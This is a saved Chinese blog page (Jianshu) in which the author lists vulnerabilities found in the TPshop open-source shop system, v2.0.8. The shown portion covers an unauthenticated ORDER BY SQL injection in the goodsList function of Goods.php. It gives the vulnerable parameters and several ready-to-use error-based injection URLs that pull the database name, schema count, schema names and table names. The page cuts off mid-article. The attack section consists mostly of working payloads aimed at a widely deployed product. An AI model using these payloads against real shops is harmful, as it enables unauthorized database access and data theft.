<!DOCTYPE html>
<!-- saved from url=(0037)http://www.jianshu.com/p/fffc0ee0dab7 -->
<html><!--<![endif]--><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0,user-scalable=no">

  <!-- Start of Baidu Transcode -->
  <meta http-equiv="Cache-Control" content="no-siteapp">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta name="applicable-device" content="pc,mobile">
  <meta name="MobileOptimized" content="width">
  <meta name="HandheldFriendly" content="true">
  <meta name="mobile-agent" content="format=html5;url=http://www.jianshu.com/p/fffc0ee0dab7">
  <!-- End of Baidu Transcode -->

    <meta name="description" content="0x00 前言 这个系统的漏洞也是放了很久了，这几天逛T00ls发现给人家爆出来了。。爆出来了。我也一次性爆完把=-=，有和T00ls论坛的那个哥们重复的纯属正常。 防止说我是照抄的，引起不好影响，下面那图是我审计的时候上传的时间，来证明一下，引起误会就不好了。 百度云 0x02 说明 TPshop开源商城系统( Thinkphp shop的简称 )，是深圳搜豹网络有限公司开发的一套多商家模...">

  <meta name="360-site-verification" content="604a14b53c6b871206001285921e81d8">
  <meta property="wb:webmaster" content="294ec9de89e7fadb">
  <meta property="qc:admins" content="104102651453316562112116375">
  <meta property="qc:admins" content="11635613706305617">
  <meta property="qc:admins" content="1163561616621163056375">
  <meta name="google-site-verification" content="cV4-qkUJZR6gmFeajx_UyPe47GW9vY6cnCrYtCHYNh4">
  <meta name="google-site-verification" content="HF7lfF8YEGs1qtCE-kPml8Z469e2RHhGajy6JPVy5XI">
  <meta http-equiv="mobile-agent" content="format=html5; url=http://www.jianshu.com/p/fffc0ee0dab7">

  <!-- Apple -->
  <meta name="apple-mobile-web-app-title" content="简书">

    <!--  Meta for Smart App Banner -->
  <meta name="apple-itunes-app" content="app-id=888237539, app-argument=jianshu://notes/20314398">
  <!-- End -->

  <!--  Meta for Twitter Card -->
  <meta content="summary" property="twitter:card">
  <meta content="@jianshucom" property="twitter:site">
  <meta content="TPshop_20171106_v2.0.8版-多个漏洞集合" property="twitter:title">
  <meta content="0x00 前言 这个系统的漏洞也是放了很久了，这几天逛T00ls发现给人家爆出来了。。爆出来了。我也一次性爆完把=-=，有和T00ls论坛的那个哥们重复的纯属正常。 防止说我是照抄的，引起不好影响，下面那图是我审计的时候上传的时间，来证明一下，引起误会就不好了。 百度云 0x02 说明 TPshop开源商城系统( Thinkphp shop的简称 )，是深圳搜豹网络有限公司开发的一套多商家模式的商城系统。适合企业及个人快速构建个性化网上商城。包含PC+IOS客户端+Adroid客户端+微商城，系统PC+后台是基于ThinkPHP5 MVC构架开发的跨平台开源软件，设计得非常灵活，具有模块..." property="twitter:description">
  <meta content="http://www.jianshu.com/p/fffc0ee0dab7" property="twitter:url">
  <!-- End -->

  <!--  Meta for OpenGraph -->
  <meta property="fb:app_id" content="865829053512461">
  <meta property="og:site_name" content="简书">
  <meta property="og:title" content="TPshop_20171106_v2.0.8版-多个漏洞集合">
  <meta property="og:type" content="article">
  <meta property="og:url" content="http://www.jianshu.com/p/fffc0ee0dab7">
  <meta property="og:description" content="0x00 前言 这个系统的漏洞也是放了很久了，这几天逛T00ls发现给人家爆出来了。。爆出来了。我也一次性爆完把=-=，有和T00ls论坛的那个哥们重复的纯属正常。 防止说我是照抄的，引起不好影...">
  <!-- End -->

  <!--  Meta for Facebook Applinks -->
  <meta property="al:ios:url" content="jianshu://notes/20314398">
  <meta property="al:ios:app_store_id" content="888237539">
  <meta property="al:ios:app_name" content="简书">

  <meta property="al:android:url" content="jianshu://notes/20314398">
  <meta property="al:android:package" content="com.jianshu.haruki">
  <meta property="al:android:app_name" content="简书">
  <!-- End -->


    <title>TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书</title>

  <meta name="csrf-param" content="authenticity_token">
<meta name="csrf-token" content="IhXWKX2W14K+ezJS6+srOHGTc+BOZ9QsYFLcvT8mwqOItAo5ha3jlCpssjzZ85eP9bvR//BXmUXZgogFI/K1JQ==">

  <link rel="stylesheet" media="all" href="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/web-217d166d73e7682f5e81.css">
  
  <link rel="stylesheet" media="all" href="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/entry-a5d96d4884b6cddc11f7.css">

  <link href="http://cdn2.jianshu.io/assets/favicons/favicon-03411b154a430b85d807b4366489c21122fb983a38f3d7ca926f882e6367b13e.ico" rel="icon">
      <link rel="apple-touch-icon-precomposed" href="http://cdn2.jianshu.io/assets/apple-touch-icons/57-a6f1f1ee62ace44f6dc2f6a08575abd3c3b163288881c78dd8d75247682a4b27.png" sizes="57x57">
      <link rel="apple-touch-icon-precomposed" href="http://cdn2.jianshu.io/assets/apple-touch-icons/72-fb9834bcfce738fd7b9c5e31363e79443e09a81a8e931170b58bc815387c1562.png" sizes="72x72">
      <link rel="apple-touch-icon-precomposed" href="http://cdn2.jianshu.io/assets/apple-touch-icons/76-49d88e539ff2489475d603994988d871219141ecaa0b1a7a9a1914f4fe3182d6.png" sizes="76x76">
      <link rel="apple-touch-icon-precomposed" href="http://cdn2.jianshu.io/assets/apple-touch-icons/114-24252fe693524ed3a9d0905e49bff3cbd0228f25a320aa09053c2ebb4955de97.png" sizes="114x114">
      <link rel="apple-touch-icon-precomposed" href="http://cdn2.jianshu.io/assets/apple-touch-icons/120-1bb7371f5e87f93ce780a5f1a05ff1b176828ee0d1d130e768575918a2e05834.png" sizes="120x120">
      <link rel="apple-touch-icon-precomposed" href="http://cdn2.jianshu.io/assets/apple-touch-icons/152-bf209460fc1c17bfd3e2b84c8e758bc11ca3e570fd411c3bbd84149b97453b99.png" sizes="152x152">

  <!-- Start of 访问统计 -->
  <script src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/push.js"></script><script src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/hm.js"></script><script async="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/analytics.js"></script><script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-35169517-1', 'auto');
  ga('send', 'pageview');
</script>

<script>
  var _hmt = _hmt || [];
  (function() {
    var hm = document.createElement("script");
    hm.src = "//hm.baidu.com/hm.js?0c0e9d9b1e7d617b3e6842e85b9fb068";
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(hm, s);
  })();
</script>

  <!-- End of 访问统计 -->
<style type="text/css">
@charset "UTF-8";
/*
 * 变量
*/
.main {
  position: relative;
  margin: 0 auto;
  padding: 0 0 30px 0;
  width: 620px;
}
.main .title {
    padding-left: 8px;
    border-left: 3px solid #EA6F5A;
    line-height: 1;
    font-size: 15px;
}
.main .collection-settings {
    position: absolute;
    top: 2px;
    right: 0;
    font-size: 13px;
    color: #A0A0A0;
}
.main .collection-settings span {
      padding-left: 4px;
}
.main .include-collection {
    width: 100%;
    padding-top: 20px;
    display: -webkit-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -webkit-flex-direction: row;
        -ms-flex-direction: row;
            flex-direction: row;
    -webkit-box-pack: start;
    -webkit-justify-content: flex-start;
        -ms-flex-pack: start;
            justify-content: flex-start;
    -webkit-box-align: center;
    -webkit-align-items: center;
        -ms-flex-align: center;
            align-items: center;
    -webkit-flex-wrap: wrap;
        -ms-flex-wrap: wrap;
            flex-wrap: wrap;
}
.main .include-collection .item {
      display: inline-block;
      margin: 0 12px 12px 0;
      min-height: 32px;
      background-color: white;
      border: 1px solid #DCDCDC;
      border-radius: 4px;
      vertical-align: top;
      overflow: hidden;
}
.main .include-collection .item img {
        width: 32px;
        height: 32px;
}
.main .include-collection .item .name {
        display: inline-block;
        padding: 0 10px;
        font-size: 14px;
}
.main .include-collection .add-collection-wrap {
      margin: 0 12px 12px 0;
}
.main .include-collection .add-collection {
      padding: 8px 12px;
      font-size: 14px;
      border: 1px solid #DCDCDC;
      border-radius: 4px;
}
.main .include-collection .add-collection i {
        margin-right: 4px;
        color: #969696;
}
.main .recommend-note a {
    position: relative;
    margin: 20px 2px 0 0;
    width: 200px;
    height: 160px;
    display: inline-block;
}
.main .recommend-note a:after {
      content: "";
      position: absolute;
      width: 200px;
      height: 160px;
      border-radius: 0 0 4px 4px;
      -webkit-box-shadow: inset 0px -80px 50px -22px rgba(0, 0, 0, 0.6);
              box-shadow: inset 0px -80px 50px -22px rgba(0, 0, 0, 0.6);
      top: 0;
      left: 0;
      z-index: 1;
}
.main .recommend-note .name {
    position: absolute;
    bottom: 40px;
    left: 10px;
    right: 10px;
    font-size: 17px;
    font-weight: bold;
    color: #ffffff;
    z-index: 2;
}
.main .recommend-note .author {
    position: absolute;
    bottom: 10px;
    left: 10px;
    right: 10px;
    z-index: 2;
}
.main .recommend-note .avatar {
    width: 20px;
    height: 20px;
    display: inline-block;
}
.main .recommend-note .avatar img {
      border-radius: 50%;
}
.main .recommend-note .author-name {
    font-size: 12px;
    color: #ffffff;
    display: inline-block;
    vertical-align: -1px;
}
.main .show-more {
    margin: 0 12px 12px 0;
    font-size: 14px;
    color: #A0A0A0;
}
</style><style type="text/css">
@charset "UTF-8";
/*
 * 变量
*/
.recommend-note {
  margin-bottom: 20px;
}
.recommend-note .meta, .recommend-note .list {
    width: 620px;
    margin: 0 auto;
}
.recommend-note .meta .title {
    padding-left: 8px;
    border-left: 3px solid #EA6F5A;
    line-height: 1;
    font-size: 15px;
}
.recommend-note .meta .title .more {
      float: right;
      font-size: 14px;
      color: #A0A0A0;
}
.recommend-note .list {
    margin-top: 20px;
}
.recommend-note .list .note {
      display: block;
      margin-bottom: 25px;
      padding: 0 0 25px 0;
      border-bottom: 1px solid #DDDDDD;
}
.recommend-note .list .note.have-img {
        min-height: 136px;
}
.recommend-note .list .note .cover {
        float: right;
        margin: -5px 0 0 15px;
        width: 150px;
        height: 120px;
        background-position: center;
        background-repeat: no-repeat;
        background-size: cover;
        border-radius: 6px;
}
.recommend-note .list .note .title {
        display: inherit;
        margin-bottom: 4px;
        font-size: 18px;
        line-height: 27px;
        font-weight: bold;
        color: #333333;
        overflow: hidden;
        -o-text-overflow: ellipsis;
           text-overflow: ellipsis;
        white-space: nowrap;
}
.recommend-note .list .note .title:hover {
          text-decoration: underline;
}
.recommend-note .list .note .title:visited {
          color: #999999;
}
.recommend-note .list .note .description {
        margin-bottom: 12px;
        font-size: 13px;
        line-height: 23px;
        color: #333333;
        overflow: hidden;
        -o-text-overflow: ellipsis;
           text-overflow: ellipsis;
        display: -webkit-box;
        -webkit-line-clamp: 2;
        -webkit-box-orient: vertical;
}
.recommend-note .list .note .author .avatar {
        display: inline-block;
        width: 24px;
        height: 24px;
        margin-right: 3px;
        border-radius: 50%;
        background-position: center;
        background-repeat: no-repeat;
        background-size: cover;
        vertical-align: middle;
}
.recommend-note .list .note .author .name {
        font-size: 13px;
        color: #333333;
        vertical-align: middle;
}
</style><style type="text/css">
@charset "UTF-8";
/*
 * 变量
*/
.pc-bind-phone-modal .modal-content, .pc-bind-phone-modal .modal-body {
  overflow: visible;
}
.pc-bind-phone-modal .dropdown-menu {
  max-height: 300px;
  overflow: auto;
}
.pc-bind-phone-modal .dropdown-menu .tag {
    background-color: #efefef;
    color: #4A4A4A;
    height: 28px;
    line-height: 28px;
    padding-left: 25px;
    font-size: 12px;
}
.reader-night-mode .pc-bind-phone-modal .dropdown-menu .tag {
  background-color: #2F2F2F;
  color: #999999;
}
</style></head>

  <body lang="zh-CN" class="reader-black-font">
    <!-- 全局顶部导航栏 -->
<nav class="navbar navbar-default navbar-fixed-top" role="navigation">
  <div class="width-limit">
    <!-- 左上方 Logo -->
    <a class="logo" href="http://www.jianshu.com/"><img src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/logo-58fd04f6f0de908401aa561cda6a0688.png" alt="Logo"></a>

    <!-- 右上角 -->
      <!-- 登录显示写文章 -->
      <a class="btn write-btn" target="_blank" href="http://www.jianshu.com/writer#/">
        <i class="iconfont ic-write"></i>写文章
</a>
    <!-- 如果用户登录，显示下拉菜单 -->
      <div class="user">
        <div data-hover="dropdown">
          <a class="avatar" href="http://www.jianshu.com/u/e199acf1e9fb"><img src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/c969adea-86f2-454f-ab6c-188fa99c4ffe.jpg" alt="120"></a>
        </div>
        <ul class="dropdown-menu">
          <li>
            <a href="http://www.jianshu.com/u/e199acf1e9fb">
              <i class="iconfont ic-navigation-profile"></i><span>我的主页</span>
</a>          </li>
          <li>
            <!-- TODO bookmarks_path -->
            <a href="http://www.jianshu.com/bookmarks">
              <i class="iconfont ic-navigation-mark"></i><span>收藏的文章</span>
</a>          </li>
          <li>
            <a href="http://www.jianshu.com/users/e199acf1e9fb/liked_notes">
              <i class="iconfont ic-navigation-like"></i><span>喜欢的文章</span>
</a>          </li>
          <li>
            <a href="http://www.jianshu.com/wallet">
              <i class="iconfont ic-navigation-wallet"></i><span>我的钱包</span>
</a>          </li>
          <li>
            <a href="http://www.jianshu.com/settings">
              <i class="iconfont ic-navigation-settings"></i><span>设置</span>
</a>          </li>
          <li>
            <a href="http://www.jianshu.com/faqs">
              <i class="iconfont ic-navigation-feedback"></i><span>帮助与反馈</span>
</a>          </li>
          <li>
            <a rel="nofollow" data-method="delete" href="http://www.jianshu.com/sign_out">
              <i class="iconfont ic-navigation-signout"></i><span>退出</span>
</a>          </li>
        </ul>
      </div>

    <div class="style-mode"><a class="style-mode-btn"><i class="iconfont ic-navigation-mode"></i></a> <div class="popover-modal" style="left: 0px; display: none;"><div class="meta"><i class="iconfont ic-navigation-night"></i><span>夜间模式</span></div> <div class="switch day-night-group"><a class="switch-btn">开</a> <a class="switch-btn active">关</a></div> <hr> <div class="switch font-family-group"><a class="switch-btn font-song">宋体</a> <a class="switch-btn font-hei active">黑体</a></div> <div class="switch"><a class="switch-btn active">简</a> <a class="switch-btn">繁</a></div></div></div>
    <div class="container">
      <div class="navbar-header">
        <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#menu" aria-expanded="false">
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
      </div>
      <div class="collapse navbar-collapse" id="menu">
        <ul class="nav navbar-nav">
            <li class="tab ">
              <a href="http://www.jianshu.com/">
                <span class="menu-text">发现</span><i class="iconfont ic-navigation-discover menu-icon"></i>
</a>            </li>
            <li class="tab ">
              <a href="http://www.jianshu.com/subscriptions">
                <span class="menu-text">关注</span><i class="iconfont ic-navigation-follow menu-icon"></i>
</a>            </li>
            <li class="tab notification"><a data-hover="dropdown" href="http://www.jianshu.com/notifications" class="notification-btn"><span class="menu-text">消息</span> <i class="iconfont ic-navigation-notification menu-icon"></i> <!----> <!----></a> <ul class="dropdown-menu"><li><a href="http://www.jianshu.com/notifications#/comments"><i class="iconfont ic-comments"></i> <span>评论</span> <!----></a></li><li><a href="http://www.jianshu.com/notifications#/chats"><i class="iconfont ic-chats"></i> <span>简信</span> <!----></a></li><li><a href="http://www.jianshu.com/notifications#/requests"><i class="iconfont ic-requests"></i> <span>投稿请求</span> <!----></a></li><li><a href="http://www.jianshu.com/notifications#/likes"><i class="iconfont ic-likes"></i> <span>喜欢和赞</span> <!----></a></li><li><a href="http://www.jianshu.com/notifications#/follows"><i class="iconfont ic-follows"></i> <span>关注</span> <!----></a></li><li><a href="http://www.jianshu.com/notifications#/money"><i class="iconfont ic-money"></i> <span>赞赏</span> <!----></a></li><li><a href="http://www.jianshu.com/notifications#/others"><i class="iconfont ic-others"></i> <span>其他消息</span> <!----></a></li></ul></li>
          <li class="search">
            <form target="_blank" action="http://www.jianshu.com/search" accept-charset="UTF-8" method="get"><input name="utf8" type="hidden" value="✓">
              <input type="text" name="q" id="q" value="" autocomplete="off" placeholder="搜索" class="search-input">
              <a class="search-btn" href="javascript:void(null)"><i class="iconfont ic-search"></i></a>
</form>          </li>
        </ul>
      </div>
    </div>
  </div>
</nav>

    
<div class="note">
  <a target="_blank" href="http://www.jianshu.com/apps/download?utm_source=sbc" id="web-note-ad-fixed"><span class="close">×</span></a>
  <div class="post">
    <div class="article">
        <h1 class="title">TPshop_20171106_v2.0.8版-多个漏洞集合</h1>

        <!-- 作者区域 -->
        <div class="author">
          <a class="avatar" href="http://www.jianshu.com/u/e199acf1e9fb">
            <img src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/c969adea-86f2-454f-ab6c-188fa99c4ffe(1).jpg" alt="96">
</a>          <div class="info">
            <span class="name"><a href="http://www.jianshu.com/u/e199acf1e9fb">P喵呜</a></span>
            <!-- 关注用户按钮 -->
            <div props-data-classes="user-follow-button-header" data-author-follow-button=""></div>
            <!-- 文章数据信息 -->
            <div class="meta">
              <!-- 如果文章更新时间大于发布时间，那么使用 tooltip 显示更新时间 -->
                <span class="publish-time" data-toggle="tooltip" data-placement="bottom" title="" data-original-title="最后编辑于 2017.11.29 00:59">2017.11.28 13:42*</span>
              <span class="wordage">字数 787</span>
            <span class="views-count">阅读 3</span><span class="comments-count">评论 0</span><span class="likes-count">喜欢 0</span></div>
          </div>
          <!-- 如果是当前作者，加入编辑按钮 -->
        <a href="http://www.jianshu.com/writer#/notebooks/9917882/notes/20314398" target="_blank" class="edit">编辑文章</a></div>
        <!-- -->

        <!-- 文章内容 -->
        <div data-note-content="" class="show-content">
          <h4>0x00 前言</h4>
<p>这个系统的漏洞也是放了很久了，这几天逛T00ls发现给人家爆出来了。。爆出来了。我也一次性爆完把=-=，有和T00ls论坛的那个哥们重复的纯属正常。</p>
<p>防止说我是照抄的，引起不好影响，下面那图是我审计的时候上传的时间，来证明一下，引起误会就不好了。</p>
<br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 306px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 28.810000000000002%;"></div>
<div class="image-view" data-width="1062" data-height="306"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-8c7ca98c0f516765.png" data-original-width="1062" data-original-height="306" data-original-format="image/png" data-original-filesize="58311" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-8c7ca98c0f516765.png"></div>
</div>
<div class="image-caption"></div>
</div>
<p>百度云</p>
<h4>0x02 说明</h4>
<p>TPshop开源商城系统( Thinkphp shop的简称 )，是深圳搜豹网络有限公司开发的一套多商家模式的商城系统。适合企业及个人快速构建个性化网上商城。包含PC+IOS客户端+Adroid客户端+微商城，系统PC+后台是基于ThinkPHP5 MVC构架开发的跨平台开源软件，设计得非常灵活，具有模块化架构体系和丰富的功能，易于与第三方应用系统无缝集成，在设计上，包含相当全面，以模块化架构体系，让应用组合变得相当灵活，功能也相当丰富。<br>
下载地址：<a href="https://link.jianshu.com/?t=http://www.tp-shop.cn/Index/Index/download.html" target="_blank" rel="nofollow">http://www.tp-shop.cn/Index/Index/download.html</a></p>
<pre class="hljs undefined"><code>目录大概结构
    ├─index.php           入口文件
    ├─Install             安装目录 //保存着各种的sql文件 php文件初始化
    ├─Thinkphp            PHP框架代码
    ├─plugins             保存插件的地方
    ├─vendor              第三方类库
    ├─Public              保存css,js，img，upload的地方
    ├─Template            模版文件 //保存手机与电脑端html的地方
    │    ├─mobile              手机模版文件
    │    ├─pc                  电脑模版文件
    ├─application         项目文件夹
    │    ├─home                电脑端业务代码 //保存着电脑端的各种功能PHP文件
    │    │    ├─Controller          控制器
    │    │    ├─lang                语言包
    │    │    ├─Logic               模型逻辑层(可以当成Services来看)
    │    │    ├─model               模型层
    │    │    ├─validate            验证器
    │    │    ├─view                视图(在这框架中并没有什么用)
    │    ├─admin                   管理端业务代码 //保存着管理端的各种功能PHP文件同上
    │    ├─mobile                  手机端业务代码 //保存着手机端的各种功能PHP文件
    │    ├─common                  全局公共函数文件夹(我也不懂为什么这里要放一大把的model的东西)
    │    ├─common.php              全局公共函数文件
    │    ├─config php              全局公共配置文件
    │    ├─database.php            数据库配置文件
    │    ├─function.php            公共函数文件
    │    ├─route.php               系统路由文件
    │    ├─tags.php                应用行为扩展定义文件
</code></pre>
<h4>0x01 正文</h4>
<h6>注入篇</h6>
<p>漏洞1：前台sql注入 order by注入<br>
文件地址：application/home/controller/Goods.php<br>
URL地址：<a href="https://link.jianshu.com/?t=http://xx.com/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/desc" target="_blank" rel="nofollow">http://xx.com/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/desc</a><br>
问题函数：goodsList()<br>
问题参数_1:  $sort = I('get.sort','goods_id'); // 排序<br>
问题参数_2:  $sort_asc = I('get.sort_asc','asc'); // 排序<br>
</p><div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 481px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 68.82000000000001%;"></div>
<div class="image-view" data-width="1315" data-height="905"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-50b33545d1ee1d41.png" data-original-width="1315" data-original-height="905" data-original-format="image/png" data-original-filesize="189580" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-50b33545d1ee1d41.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 354px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 50.67%;"></div>
<div class="image-view" data-width="1502" data-height="761"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-de277ff11d4f1677.png" data-original-width="1502" data-original-height="761" data-original-format="image/png" data-original-filesize="231203" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-de277ff11d4f1677.png"></div>
</div>
<div class="image-caption"></div>
</div>因为是order by 的注入所以要利用一些平时用不到的sql语句<p></p>
<p></p>
<p></p>
爆当前库名：<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 284px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 40.699999999999996%;"></div>
<div class="image-view" data-width="1919" data-height="781"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-a5459ac783274560.png" data-original-width="1919" data-original-height="781" data-original-format="image/png" data-original-filesize="171126" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-a5459ac783274560.png"></div>
</div>
<div class="image-caption"></div>
</div>
<pre class="hljs undefined"><code>http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT database() ),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))
</code></pre>
<p></p>
<p></p>
爆此mysql库的总数：<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 306px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 43.769999999999996%;"></div>
<div class="image-view" data-width="1917" data-height="839"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-16dc7c2a7695c770.png" data-original-width="1917" data-original-height="839" data-original-format="image/png" data-original-filesize="185136" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-16dc7c2a7695c770.png"></div>
</div>
<div class="image-caption"></div>
</div>
<pre class="hljs undefined"><code>http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 8138 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)
</code></pre>
<p></p>
<p></p>
爆某个库的名称：<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 671px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 34.949999999999996%;"></div>
<div class="image-view" data-width="1920" data-height="671"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-755dcbc0ff4a6704.png" data-original-width="1920" data-original-height="671" data-original-format="image/png" data-original-filesize="170595" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-755dcbc0ff4a6704.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 680px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 36.15%;"></div>
<div class="image-view" data-width="1881" data-height="680"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-f61e77f8ee7ed30c.png" data-original-width="1881" data-original-height="680" data-original-format="image/png" data-original-filesize="158520" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-f61e77f8ee7ed30c.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 275px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 39.35%;"></div>
<div class="image-view" data-width="1868" data-height="735"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-1186d956e429d99c.png" data-original-width="1868" data-original-height="735" data-original-format="image/png" data-original-filesize="162780" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-1186d956e429d99c.png"></div>
</div>
<div class="image-caption"></div>
</div>
<pre class="hljs undefined"><code>http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 4362 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,451) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)
</code></pre>
<p></p>
<p></p>
获取某个库表的总数：<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 671px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 34.949999999999996%;"></div>
<div class="image-view" data-width="1920" data-height="671"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-349863856df39b6a.png" data-original-width="1920" data-original-height="671" data-original-format="image/png" data-original-filesize="170102" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-349863856df39b6a.png"></div>
</div>
<div class="image-caption"></div>
</div>
<pre class="hljs undefined"><code>http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 8139 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x747073686f70322e302e36)),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)
</code></pre>
<p>获取某个库每个表的表名：</p>
<br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 274px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 39.24%;"></div>
<div class="image-view" data-width="1901" data-height="746"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-1796fcdf7c334891.png" data-original-width="1901" data-original-height="746" data-original-format="image/png" data-original-filesize="181539" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-1796fcdf7c334891.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 346px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 49.55%;"></div>
<div class="image-view" data-width="1889" data-height="936"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-b472179faeb08b59.png" data-original-width="1889" data-original-height="936" data-original-format="image/png" data-original-filesize="199271" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-b472179faeb08b59.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 296px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 42.29%;"></div>
<div class="image-view" data-width="1887" data-height="798"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-ebd68064710028fd.png" data-original-width="1887" data-original-height="798" data-original-format="image/png" data-original-filesize="184263" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-ebd68064710028fd.png"></div>
</div>
<div class="image-caption"></div>
</div>
<pre class="hljs undefined"><code>http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 3572 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,451) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x747073686f70322e302e36) LIMIT 2,1),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)
</code></pre>
<p>获取某个表的字段总数：</p>
<br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 354px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 50.629999999999995%;"></div>
